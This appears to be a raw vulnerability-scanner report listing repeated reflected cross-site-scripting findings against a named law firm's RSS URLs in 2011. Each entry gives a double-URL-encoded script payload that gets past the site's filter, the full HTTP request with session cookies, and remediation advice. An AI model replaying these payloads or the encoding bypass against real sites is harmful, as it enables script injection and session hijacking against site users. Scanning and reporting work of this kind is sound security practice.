The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f92%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7324d443b57 was submitted in the REST URL parameter 4. This input was echoed as a7f92"><script>alert(1)</script>7324d443b57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Bankruptcy__Financial_Restructuring/rss.xmla7f92%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7324d443b57 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 413f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89fd6730150 was submitted in the REST URL parameter 1. This input was echoed as 413f8"><script>alert(1)</script>89fd6730150 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss413f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89fd6730150/practices/Communications/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fe4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c5c30db8e was submitted in the REST URL parameter 2. This input was echoed as 3fe4c"><script>alert(1)</script>24c5c30db8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices3fe4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c5c30db8e/Communications/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21c62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda39f0f31a2 was submitted in the REST URL parameter 3. This input was echoed as 21c62"><script>alert(1)</script>da39f0f31a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Communications21c62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda39f0f31a2/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c659f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b7507567a was submitted in the REST URL parameter 4. This input was echoed as c659f"><script>alert(1)</script>72b7507567a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Communications/rss.xmlc659f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b7507567a HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f366f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6a0233650 was submitted in the REST URL parameter 1. This input was echoed as f366f"><script>alert(1)</script>a6a0233650 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssf366f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6a0233650/practices/Corporate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8174b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb0e9ce51eb was submitted in the REST URL parameter 2. This input was echoed as 8174b"><script>alert(1)</script>fb0e9ce51eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices8174b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb0e9ce51eb/Corporate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 114fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e550bbc6f87b was submitted in the REST URL parameter 3. This input was echoed as 114fe"><script>alert(1)</script>550bbc6f87b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Corporate114fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e550bbc6f87b/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e495b8d11a77 was submitted in the REST URL parameter 4. This input was echoed as 6f9cb"><script>alert(1)</script>495b8d11a77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Corporate/rss.xml6f9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e495b8d11a77 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2f1002c72f was submitted in the REST URL parameter 1. This input was echoed as d782d"><script>alert(1)</script>d2f1002c72f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssd782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2f1002c72f/practices/Election_Law__Government_Ethics/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ddc1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11d8c833232 was submitted in the REST URL parameter 2. This input was echoed as 8ddc1"><script>alert(1)</script>11d8c833232 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices8ddc1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11d8c833232/Election_Law__Government_Ethics/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de06e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97b01f23fb3 was submitted in the REST URL parameter 3. This input was echoed as de06e"><script>alert(1)</script>97b01f23fb3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Election_Law__Government_Ethicsde06e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97b01f23fb3/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d35d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1977a3e2ac was submitted in the REST URL parameter 4. This input was echoed as 6d35d"><script>alert(1)</script>1977a3e2ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Election_Law__Government_Ethics/rss.xml6d35d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1977a3e2ac HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 290f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18476e2452b was submitted in the REST URL parameter 1. This input was echoed as 290f3"><script>alert(1)</script>18476e2452b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss290f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18476e2452b/practices/Employment__Labor/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b5ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43dabe5a732 was submitted in the REST URL parameter 2. This input was echoed as 9b5ec"><script>alert(1)</script>43dabe5a732 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices9b5ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43dabe5a732/Employment__Labor/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28bea29faf8 was submitted in the REST URL parameter 3. This input was echoed as e75a9"><script>alert(1)</script>28bea29faf8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Employment__Labore75a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28bea29faf8/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e26b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea05a8e876db was submitted in the REST URL parameter 4. This input was echoed as 7e26b"><script>alert(1)</script>a05a8e876db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Employment__Labor/rss.xml7e26b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea05a8e876db HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac191%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e408ea2dc39c was submitted in the REST URL parameter 1. This input was echoed as ac191"><script>alert(1)</script>408ea2dc39c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssac191%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e408ea2dc39c/practices/Environment__Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faef9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09c7b47057d was submitted in the REST URL parameter 2. This input was echoed as faef9"><script>alert(1)</script>09c7b47057d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesfaef9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09c7b47057d/Environment__Safety/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
